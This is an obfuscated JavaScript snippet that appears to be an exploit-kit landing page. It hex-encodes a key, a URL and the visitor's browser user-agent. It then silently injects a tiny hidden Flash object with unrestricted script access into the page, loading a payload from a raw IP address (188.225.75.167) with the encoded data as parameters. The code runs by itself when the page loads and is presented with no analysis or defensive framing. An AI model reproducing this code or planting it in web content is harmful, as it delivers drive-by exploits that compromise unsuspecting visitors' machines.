/*s61741d73230hssfj13322fs*/function hgfgerdfgdf(num, width){/*s15101d69597hfj18356fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s65447d1374hfj31394fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s38392d51711hfj66463fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s74192d12622hfj44466fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd50651hfs*/c += b + d;/*s49206d52695hfj71186fs*/e += 1;}return c;}/*s33359dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.75.167/?NzI5NjQyODQ=&elsa=uyjEGJeQRkmYZcUl1G9v-piEOByxSd1MOF_EOEMAsQ-8eXFeJo2lnymrAkec0lwReA6FETi-hL&rand=xX_QMvWdbRXQCJ3EKvrcT6NEMVHRH0CL2Y-dmrHQefjaeVWkzrLFTF_yozKASwSG6_FtdfJSDQ&info=NDA5NDMxODE=&travel=MjU1MjMwMzE=", ghnvbn("http://188.225.75.167/?MTAzMjcxNTA5&rand=xXzQMvWdbRXQC53EKvncT6NHMVHRH0CL2Y-dmrHQefjaelWkzrLFTF_xozKASwSG6_FtdfJSDQ&info=MTI2MDY1NzA=&elsa=uyjEGJeQdkmYZcUl1G9f-piECByxSe1MOF_0OEMAgQ-8eXFeJo2VnymrAkcsImzx6E61ENjOge&befe=MzcwMTI4ODQ=","wexykukusw"));